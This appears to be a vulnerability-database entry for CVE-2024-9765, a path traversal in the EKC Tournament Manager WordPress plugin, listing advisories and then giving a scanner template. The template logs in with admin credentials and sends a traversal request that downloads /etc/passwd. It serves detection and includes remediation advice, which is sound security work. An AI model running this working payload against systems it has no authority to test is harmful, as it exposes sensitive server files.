| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-9765 | 16 May 2025 20:34 | – | circl |
| WordPress plugin EKC Tournament Manager Security Vulnerability | 15 May 2025 00:00 | – | cnnvd |
| CVE-2024-9765 | 15 May 2025 20:07 | – | cve |
| CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability | 15 May 2025 20:07 | – | cvelist |
| EUVD-2025-15201 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-9765 | 15 May 2025 20:16 | – | nvd |
| WordPress EKC Tournament Manager plugin < 2.2.2 - Admin+ Arbitrary File Download vulnerability | 19 May 2025 03:59 | – | patchstack |
| PT-2025-21550 | 15 May 2025 00:00 | – | ptsecurity |
| CVE-2024-9765 | 17 May 2025 21:03 | – | redhatcve |
| CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability | 15 May 2025 20:07 | – | vulnrichment |

```yaml
id: CVE-2024-9765

info:
  name: EKC Tournament Manager WordPress plugin - Path Traversal
  author: Sourabh-Sahu
  severity: medium
  description: |
    EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
  impact: |
    Logged in admin users can download arbitrary system files, potentially exposing sensitive information.
  remediation: |
    Upgrade to version 2.2.2 or later.
  reference:
    - https://wpscan.com/vulnerability/c86157b0-43f3-4e82-9697-7dd9401b48d6/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-9765
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.01414
    epss-percentile: 0.69472
    cpe: cpe:2.3:a:lukashuser:ekc_tournament_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lukashuser
    product: ekc_tournament_manager
  tags: cve,cve2024,lukashuser,ekc-tournament-manager,authenticated,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
        condition: and
# digest: 4a0a00473045022100e6834ac66c093ed7f65a160720823b2dd64dad0a77c5ac397b85ff13ecf70e5f0220665657bdddd1d4711f0ffbd58095b72b84771edd5125bf3ea9d880f1217126bf:922c64590222798bb761d5b6d8e72950
```